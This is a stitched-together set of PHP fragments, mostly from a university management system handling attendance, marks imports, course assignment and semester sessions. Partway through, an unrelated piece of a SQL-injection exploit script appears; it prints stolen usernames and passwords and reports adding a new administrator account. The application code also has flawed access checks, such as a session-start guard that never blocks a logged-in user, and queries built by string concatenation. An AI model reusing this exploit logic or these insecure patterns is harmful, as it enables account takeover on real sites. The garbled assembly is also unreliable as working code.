public function importCSV($course_code, $course_dep, $filename)
{
if (!loggedIn() || privilege() == NULL || privilege() == 'admin') {
return 0;
}
$file = fopen($filename, "r");
$count = 0;
while (($data = fgetcsv($file, 10000, ",")) !== FALSE) {
$count++;
if ($count > 1) {
$save = $this->newEntry($data[0], $course_code, $course_dep, $data[1], $data[2]);
}
}
fclose($file);
return 1;
}
public function startNewSession()
{
if (!loggedIn() && (privilege() != 'dean' || privilege() != 'director' || privilege() != 'admin')) {
return 0;
}
$this->_connect();
if (!Session::exists('semester_session')) {
$type = 'odd';
$session = date('Y');
} else {
if (Session::get('semester_type') === 'even') {
$type = 'odd';
$session = Session::get('semester_session');
} else {
if (Session::get('semester_type') === 'odd') {
$type = 'even';
$session = Session::get('semester_session') + 1;
}
}
}
$timestamp = date('Y-m-d H:i:s');
$query = "INSERT INTO semester_session (session,type,starting_timestamp) VALUES('" . $session . "','" . $type . "','" . $timestamp . "')";
$result = $this->_db->query($query);
if ($this->_db->affected_rows && $this->_db->error == '') {
$this->getRunningSession();
return 1;
} else {
return 0;
}
}
/**
* Admin has a priority of 0
* Director, Dean has a priority of 1
* HOD has a priority of 2
* DUPC/DPPC has a priority of 3
* Teacher has a priority of 4
* Student has a priority of 5
* @return integer
* @author Harsh Vardhan Ladha & Yogesh Chauhan
* @package MIS
* @link http://mis.nits.ac.in
* @license NIT Silchar
*/
function privilegePriority()
{
switch (privilege()) {
case 'admin':
return 0;
case 'director':
case 'dean':
return 1;
case 'hod':
return 2;
case 'dupc':
case 'dppc':
return 3;
case 'teacher':
return 4;
case 'student':
return 5;
}
}
<?php
require_once '../core/init.php';
if (Input::exists() && privilege() != NULL && privilege() != 'admin') {
$validate = new Validate();
$validation = $validate->check($_POST, array('course_id' => array('required' => true)));
if ($validate->passed()) {
if (empty($_FILES["file"]["tmp_name"])) {
echo '<div class="alert alert-danger alert-dismissible" role="alert">';
echo '<button type="button" class="close" data-dismiss="alert"><span aria-hidden="true">×</span><span class="sr-only">Close</span></button>';
echo 'Please Select CSV File';
echo '</div>';
die;
}
$input = explode(',', Input::get('course_id'));
$m = new Attendance();
$import = $m->importCSV($input[0], $input[1], $_FILES["file"]["tmp_name"]);
if ($import) {
echo '<div class="alert alert-success alert-dismissible" role="alert">';
echo '<button type="button" class="close" data-dismiss="alert"><span aria-hidden="true">×</span><span class="sr-only">Close</span></button>';
echo "Successfully Imported";
echo '</div>';
} else {
echo '<div class="alert alert-danger alert-dismissible" role="alert">';
echo '<button type="button" class="close" data-dismiss="alert"><span aria-hidden="true">×</span><span class="sr-only">Close</span></button>';
echo "Temporary problem!";
echo '</div>';
}
} else {
echo '<div class="alert alert-warning alert-dismissible" role="alert">';
echo '<button type="button" class="close" data-dismiss="alert"><span aria-hidden="true">×</span><span class="sr-only">Close</span></button>';
<?php
require_once '../core/init.php';
if (Input::exists('post') && privilege() != NULL) {
$validate = new Validate();
$validation = $validate->check($_POST, array('coursecode' => array('required' => true), 'department' => array('required' => true), 'teacher' => array('required' => true), 'semester' => array('required' => true)));
if ($validate->passed()) {
$course = new Course();
$add = $course->appointCourse(Input::get('teacher'), Input::get('coursecode'), Input::get('semester'), Input::get('department'));
if ($add == 3) {
echo '<div class="alert alert-danger alert-dismissible" role="alert">';
echo '<button type="button" class="close" data-dismiss="alert"><span aria-hidden="true">×</span><span class="sr-only">Close</span></button>';
echo 'Sorry, This teacher is not yet approved to use this system.';
echo '</div>';
} else {
if ($add == 2) {
echo '<div class="alert alert-danger alert-dismissible" role="alert">';
echo '<button type="button" class="close" data-dismiss="alert"><span aria-hidden="true">×</span><span class="sr-only">Close</span></button>';
echo 'Same course is already assigned to same teacher in this department.';
echo '</div>';
} else {
if ($add == 1) {
echo '<div class="alert alert-success alert-dismissible" role="alert">';
echo '<button type="button" class="close" data-dismiss="alert"><span aria-hidden="true">×</span><span class="sr-only">Close</span></button>';
echo 'Course assigned to teacher successfully.';
echo '</div>';
} else {
if ($add == 0) {
echo '<div class="alert alert-danger alert-dismissible" role="alert">';
echo '<button type="button" class="close" data-dismiss="alert"><span aria-hidden="true">×</span><span class="sr-only">Close</span></button>';
echo 'Temporary Error!';
<?php
require_once '../core/init.php';
if (!loggedIn() || privilege() == NULL || privilege() == 'admin') {
die;
}
?>
<!-- DATA TABLES -->
<link href="css/datatables/dataTables.bootstrap.css" rel="stylesheet" type="text/css" />
<?php
$s = new Student();
$s->getInfo(Session::get('sn'));
?>
<section class="content-header">
<h1>
Attendance System
<small>View attendance</small>
</h1>
<ol class="breadcrumb">
<li><a href="home.php"><i class="fa fa-dashboard"></i> Home</a></li>
<li><a href="#">Attendance System</a></li>
<li class="active">View attendance</li>
</ol>
</section>
<!-- Main content -->
<section class="content">
<div class="row">
<div class="col-md-1">
</div>
<?php
require_once '../core/init.php';
if (Input::exists() && privilege() != NULL) {
$validate = new Validate();
$validation = $validate->check($_POST, array('course_id' => array('required' => true), 'examtype' => array('required' => true), 'category' => array('required' => true)));
if ($validate->passed()) {
$m = new Marks();
$lastdate = $m->getLastDate(Input::get('examtype'))->fetch_object()->date;
$today = date('Y-m-d');
if ($today >= $lastdate) {
$date = date_create($lastdate);
echo '<div class="alert alert-danger alert-dismissible" role="alert">';
echo '<button type="button" class="close" data-dismiss="alert"><span aria-hidden="true">×</span><span class="sr-only">Close</span></button>';
echo "Last Date for " . strtoupper(Input::get('examtype')) . " was " . date_format($date, 'd-M-Y');
echo '</div>';
die;
}
if (empty($_FILES["file"]["tmp_name"])) {
echo '<div class="alert alert-danger alert-dismissible" role="alert">';
echo '<button type="button" class="close" data-dismiss="alert"><span aria-hidden="true">×</span><span class="sr-only">Close</span></button>';
echo 'Please Select CSV File';
echo '</div>';
die;
}
$input = explode(',', Input::get('course_id'));
$m = new Marks();
$import = $m->importCSV($input[0], $input[1], Input::get('examtype'), Input::get('category'), $_FILES["file"]["tmp_name"]);
if ($import) {
echo '<div class="alert alert-success alert-dismissible" role="alert">';
echo '<button type="button" class="close" data-dismiss="alert"><span aria-hidden="true">×</span><span class="sr-only">Close</span></button>';
<?php
require_once '../core/init.php';
if (!loggedIn()) {
die;
}
if (privilege() == NULL) {
die;
}
?>
<div class="row" id="content_area">
<div class="col-xs-12">
<div class="box">
<div class="box-header">
<h3 class="box-title">List of all Teachers</h3>
</div><!-- /.box-header -->
<div class="box-body table-responsive">
<table id="example1" class="table table-bordered table-striped">
<thead>
<tr>
<th>Name</th>
<th>Privilege</th>
<th>Department</th>
<th>Email</th>
<th>Mobile</th>
<th>Approved</th>
<th>Blocked</th>
<th> </th>
</tr>
</thead>
<tbody>
public function updateBiography($scholar_no, $biography, $cv = '')
{
if (!loggedIn() || privilege() == NULL) {
return 0;
}
$this->_connect();
$scholar_no = $this->_db->real_escape_string(escape($scholar_no));
$biography = $this->_db->real_escape_string($biography);
if ($cv == '') {
$query = "UPDATE students_info SET biography = '" . $biography . "' WHERE scholar_no='" . $scholar_no . "'";
} else {
$cv = $this->_db->real_escape_string($cv);
$query = "UPDATE students_info SET biography = '" . $biography . "', cv_link='" . $cv . "' WHERE scholar_no='" . $scholar_no . "'";
}
$result = $this->_db->query($query);
if ($this->_db->error == '') {
if ($this->_db->affected_rows) {
return 1;
} else {
return 2;
}
} else {
return 0;
}
}
</ul>
</li>
<?php
if (privilege() != 'admin') {
?>
<li <?php
echo Session::get('side-nav-active') === 'attendance' ? 'class=active' : '';
?>
>
<a href="attendance.php">
<i class="fa fa-calendar"></i> <span>Attendance System</span>
</a>
</li>
<?php
}
if (privilege() === 'admin' || privilege() === 'director' || privilege() === 'dean') {
?>
<li <?php
echo Session::get('side-nav-active') === 'settings' ? 'class=active' : '';
?>
>
<a href="settings.php">
<i class="fa fa-wrench"></i> <span>System Settings</span>
</a>
</li>
<?php
}
?>
</ul>
</section>
<!-- /.sidebar -->
<?php
require_once 'core/init.php';
if (!loggedIn()) {
Redirect::to('index.php');
} else {
if (loggedIn() && (privilege() === 'teacher' || privilege() === 'dppc' || privilege() === 'dupc') || privilege() === 'student') {
include 'includes/errors/404.php';
die;
}
}
?>
<link rel="icon" href="images/nits2.jpg">
<link rel="shortcut icon" href="images/nits2.jpg" />
<script type="text/javascript" src="js/jquery.min.js"></script>
<link rel="stylesheet" type="text/css" href="css/result.css">
<script>
function load_pie(type){
$("#pie").load('ajax/log_pie.php?type='+type);
}
</script>
<div class="tableh">System Log</div>
<div class="res">
<table>
<tr>
<td class="sel">
Select Log Type
</td>
<td>
<select name="credit" class="box" OnChange="load_pie(this.value);">
<option value="" selected>Default</option>
<?php
require_once '../core/init.php';
if (loggedIn() && privilege() != NULL) {
if (Input::exists('get')) {
$tid = Input::get('tid');
$cid = Input::get('cid');
$did = Input::get('did');
$a = new Approval();
$b = $a->approve($tid, $cid, $did);
if ($b === 1) {
echo '<div class="alert alert-success alert-dismissible" role="alert">';
echo 'Result approved!';
echo '</div>';
} else {
if ($b === 2) {
echo '<div class="alert alert-warning alert-dismissible" role="alert">';
echo 'Already approved by you!';
echo '</div>';
} else {
if ($b === 0) {
echo '<div class="alert alert-success alert-dismissible" role="alert">';
echo 'Temporary Error!';
echo '</div>';
} else {
echo '<div class="alert alert-danger alert-dismissible" role="alert">';
echo $b;
echo '</div>';
}
}
}
public function remove_appointed_course($id, $course_code, $department, $semester)
{
if (!loggedIn()) {
return 'Temporary Problem.';
}
if (loggedIn() && (privilege() === 'teacher' || privilege() === 'dppc' || privilege() === 'dupc' || privilege() == NULL)) {
return 'Access Denied. No privilege.';
}
$this->_connect();
$id = $this->_db->real_escape_string($id);
$course_code = $this->_db->real_escape_string($course_code);
$department = $this->_db->real_escape_string($department);
$semester = $this->_db->real_escape_string($semester);
$query = "DELETE FROM courses_appointed WHERE id='" . $id . "' AND course_code='" . $course_code . "' AND course_dep='" . $department . "' AND course_sem='" . $semester . "'AND timestamp>=' " . Session::get('semester_timestamp') . "'";
$result = $this->_db->query($query);
if ($this->_db->affected_rows) {
if ($this->_db->error == '') {
return 'Entry has been Deleted';
} else {
echo '1';
die($this->_db->error);
}
} else {
return 'Temporary Problem.';
}
}
public function deleteT($t_id = '', $privilege = 'teacher')
{
if (loggedIn() && ($privilege === 'director' && (privilege() === 'hod' || privilege() === 'dupc' || privilege() === 'dppc' || privilege() === 'teacher') || $privilege === 'dean' && (privilege() === 'hod' || privilege() === 'dupc' || privilege() === 'dppc' || privilege() === 'teacher') || $privilege === 'hod' && (privilege() === 'dupc' || privilege() === 'dppc' || privilege() === 'teacher') || $privilege === 'dppc' && privilege() === 'teacher' || $privilege === 'dupc' && privilege() === 'teacher')) {
return 'No privilege';
}
if (loggedIn() && $this->deleteTeacherError($t_id)) {
return "Sorry, cannot remove this teacher because he/she already has<br/>(<i>in this running session</i>)<br/>" . ($this->_tce != 0 ? " <b>{$this->_tce}</b> courses appointed.<br/>" : "") . ($this->_tae != 0 ? " <b>{$this->_tae}</b> subject results not fully approved." : "");
}
if (loggedIn()) {
if (Session::exists('teacher_id')) {
if (Session::get('teacher_id') == $t_id) {
return 'Can\'t delete yourself.';
}
}
$this->_connect();
$this->_id = $this->_db->real_escape_string(escape($t_id));
$query = "DELETE FROM teachers WHERE teacher_id='" . $this->_id . "'";
$result = $this->_db->query($query);
if ($this->_db->affected_rows) {
if ($this->_db->error == '') {
return 'Teacher removed.';
} else {
die($this->_db->error);
}
} else {
return 'Temporary Error';
}
}
if (!loggedIn()) {
return 'Temporary error';
}
}
<?php
require_once '../core/init.php';
if (Input::exists('get') && Input::get('a') != '' && (privilege() == 'dean' || privilege() == 'director' || privilege() == 'admin')) {
$ab = Input::get('a');
$s = new Semester();
if ($ab == 1) {
$a = $s->startRegistration();
if ($a == 1) {
echo '<div class="alert alert-success alert-dismissible" role="alert">';
echo '<button type="button" class="close" data-dismiss="alert"><span aria-hidden="true">×</span><span class="sr-only">Close</span></button>';
echo 'Registration process started.';
echo '</div>';
} else {
if ($a == 2) {
echo '<div class="alert alert-warning alert-dismissible" role="alert">';
echo '<button type="button" class="close" data-dismiss="alert"><span aria-hidden="true">×</span><span class="sr-only">Close</span></button>';
echo 'No changes made.';
echo '</div>';
} else {
if ($a == 0) {
echo '<div class="alert alert-danger alert-dismissible" role="alert">';
echo '<button type="button" class="close" data-dismiss="alert"><span aria-hidden="true">×</span><span class="sr-only">Close</span></button>';
echo 'Invalid authentication. Please try again later or re-login.';
echo '</div>';
}
}
}
}
if ($ab == 2) {
$a = $s->stopRegistration();
<?php
require_once 'core/init.php';
include 'header.php';
if (!loggedIn()) {
Redirect::to('index.php');
}
if (loggedIn() && !Session::exists('teacher_id') || privilege() == NULL) {
Session::destroy();
Redirect::to('includes/errors/unauthorized.php');
}
?>
<div id="update"></div>
<form id="import" method="post" action="import_excel.php">
<div class="box box-default">
<div class="box-header">
<h3 class="box-title">Import CSV/Excel file</h3>
</div>
<div class="box-body">
<div class="form-group">
<label for="course">Select course with respective department</label>
<select name="course_id" class="form-control">
<option value="" >Select your Course</option>
<?php
$i = 0;
$c = new Course();
$courses = $c->getAppointed(Session::get('teacher_id'));
while (!empty($courses) && ($course = $courses->fetch_object())) {
?>
<option value="<?php
echo $course->course_code . ',' . $course->course_dep;
return false;
}
}
if ($argv[5] == "normal") {
$normal = inj3ct_sql($argv[1], $argv[2], $argv[3], $argv[4]);
if (isset($normal[0])) {
echo "[?] Password: {$normal['1']}\r\n";
echo "[?] Username: {$normal['0']}\r\n";
die;
} else {
echo "[?] Exploit Failed!\r\n";
die;
}
}
if ($argv[5] == "privilege") {
if (privilege($argv[1], $argv[2], $argv[3], $argv[4])) {
echo "[?] Added New Administrator\r\n";
echo "[?] Username: {$argv['3']}\r\n";
echo "[?] Password: {$argv['4']}\r\n";
die;
} else {
echo "[?] Exploit Failed!\r\n";
die;
}
}
function http_request($conn, $path, $post)
{
if (!preg_match('/\\w:[0-9]/i', $conn)) {
usage();
}
$addr = explode(':', $conn);
<?php
require_once '../core/init.php';
if (privilege() == NULL || privilege() == 'teacher' || privilege() == 'hod' || privilege() == 'dupc' || privilege() == 'dppc') {
die;
}
$sem = new Semester();
$new = $sem->startNewSession();
if ($new) {
if (Session::exists('semester_session')) {
?>
<table class="table">
<tr>
<th>Session (year)</th>
<td><?php
echo Session::get('semester_session');
?>
</td>
</tr>
<tr>
<th>Type</th>
<td><?php
echo strtoupper(Session::get('semester_type'));
?>
</td>
</tr>
<tr>
<th>Starting Date</th>
<td>
<?php
$date = Session::get('semester_timestamp');
<?php
if (!loggedIn() || privilege() == NULL) {
Redirect::to('logout.php');
}
$s = new Student();
$s->getInfo(Session::get('sn'));
?>
<section class="content-header">
<h1>
Public Profile
<small>Your Public Profile</small>
<b><small>http://nits.ac.in/s/<?php
$username = explode('@', $s->getEmail())[0];
echo "{$username}";
?>
</small></b>
</h1>
<ol class="breadcrumb">
<li><a href="home.php"><i class="fa fa-dashboard"></i> Home</a></li>
<li class="active"><a href="#">Public Profile</a></li>
</ol>
</section>
<!-- Main content -->
<section class="content">
<div class="row" id="preview">
</div>
<div class="row">
<div class="col-md-12">
<?php
require_once '../core/init.php';
if (Input::exists('get') || !Input::exists() || privilege() == NULL) {
die;
}
$type = Input::get('examtype');
$t = new Teacher();
$tt = $t->getInfo(Session::get('teacher_id'));
if (!Input::get('course_id')) {
?>
<div class="box box-primary">
<div class="box-header">
<h3 class="box-title">Please Select Course</h3>
</div> <!-- ./box header -->
</div>
<?php
die;
}
if (!Input::get('examtype')) {
?>
<div class="box box-primary">
<div class="box-header">
<h3 class="box-title">Please Select Exam Type</h3>
</div> <!-- ./box header -->
</div>
<?php
die;
}
public function deleteDep($dept_id = '')
{
if (loggedIn() && (privilege() === 'teacher' || privilege() === 'dppc' || privilege() === 'dupc')) {
return 'No privilege.';
}
if (loggedIn() && $this->deleteDepError($dept_id)) {
return "Sorry, cannot remove this department because it already has<br/>" . ($this->_dce != 0 ? " <b>{$this->_dce}</b> courses.<br/>" : "") . ($this->_dte != 0 ? " <b>{$this->_dte}</b> teachers." : "");
} else {
if (loggedIn()) {
$this->_connect();
$this->_dept_id = $this->_db->real_escape_string(escape($dept_id));
$query = "DELETE FROM department WHERE dept_id='" . $this->_dept_id . "'";
$result = $this->_db->query($query);
if ($this->_db->affected_rows) {
if ($this->_db->error == '') {
return 'Department has been Deleted';
} else {
die($this->_db->error);
}
} else {
return 'Temporary Problem.';
}
} else {
if (!loggedIn()) {
return 'Temporary Problem';
}
}
}
}
public function setLastDate($type, $lastdate)
{
if (loggedIn() && (privilege() == 'admin' || privilege() == 'director' || privilege() == 'dean')) {
$this->_connect();
$type = $this->_db->real_escape_string(escape($type));
$lastdate = $this->_db->real_escape_string(escape($lastdate));
$query = "UPDATE last_dates SET date = '" . $lastdate . "' WHERE exam_type='" . $type . "'";
$result = $this->_db->query($query);
if ($this->_db->affected_rows) {
if ($this->_db->error == '') {
return 1;
} else {
die($this->_db->error);
}
} else {
return 4;
}
} else {
if (loggedIn()) {
return 3;
} else {
if (!loggedIn()) {
return 0;
}
}
}
}
<?php
require_once 'core/init.php';
if (!loggedIn()) {
Redirect::to('logout.php');
} else {
if (loggedIn() && (privilege() === 'teacher' || privilege() === 'dppc' || privilege() === 'dupc' || privilege() == NULL)) {
Session::destroy();
Redirect::to('includes/errors/unauthorized.php');
}
}
?>
<section class="content-header">
<h1>
Departments
<small>Create new department</small>
</h1>
<ol class="breadcrumb">
<li><a href="home.php"><i class="fa fa-dashboard"></i> Home</a></li>
<li><a href="#">Departments</a></li>
<li class="active">Create new department</li>
</ol>
</section>
<!-- Main content -->
<section class="content">
<div class="col-md-6">
<div id="update">
</div>
<div class="box box-default">
<?php
require_once 'core/init.php';
if (!loggedIn() || privilege() == NULL) {
Redirect::to('logout.php');
}
if (privilege() == 'admin') {
Redirect::to('settings.php');
}
include 'header.php';
Session::put('side-nav-active', 'home');
Session::put('side-nav-active-sub', '');
include 'sidebar.php';
Session::delete('side-nav-active');
Session::delete('side-nav-active-sub');
include 'welcome.php';
include 'footer.php';
<?php
include_layout_template('admin_header.php');
?>
<!-- //header -->
<br>
<br>
<!-- Content -->
<div class="row-fluid">
<div class="span3">
<div class="bs-docs-sidebar create" style="padding-left:2px; padding-righ:2px;" >
<h2 style="text-align:center">Notice</h2>
<hr>
<p>Welcome to the admin panel of the application form. You are currently signed in with <?php
echo privilege();
?>
privileges <?php
if (isset($dept)) {
echo "for <strong>" . $dept . "</strong>";
}
?>
. Actions done on this end are strictly confidential and are being logged.</p>
<p>Other information can be put here</p>
</div>
</div>
<div class="span9">
<h2>Control Panel <i class="iconic-cog"></i></h2>
<hr>
<td>
<?php
echo $key->reject_msg;
?>
</td>
</tr>
<?php
}
}
?>
</table>
</div><!-- ./box body -->
</div>
</div>
<?php
if (privilege() === 'dupc' || privilege() === 'dppc' || privilege() === 'hod' || privilege() === 'dean' || privilege() === 'director') {
?>
<div class="col-md-3">
<div class="box box-warning">
<form id="view_result" role="form">
<div class="box-header">
<h3 class="box-title">Approve pending courses</h3>
</div><!-- ./box-header -->
<div class="box-body">
<div class="form-group">
<label for="course">Select course</label>
<select class="form-control" id="course" name="course_id">
<option value="" >Select Course</option>
<?php
$a = new Approval();
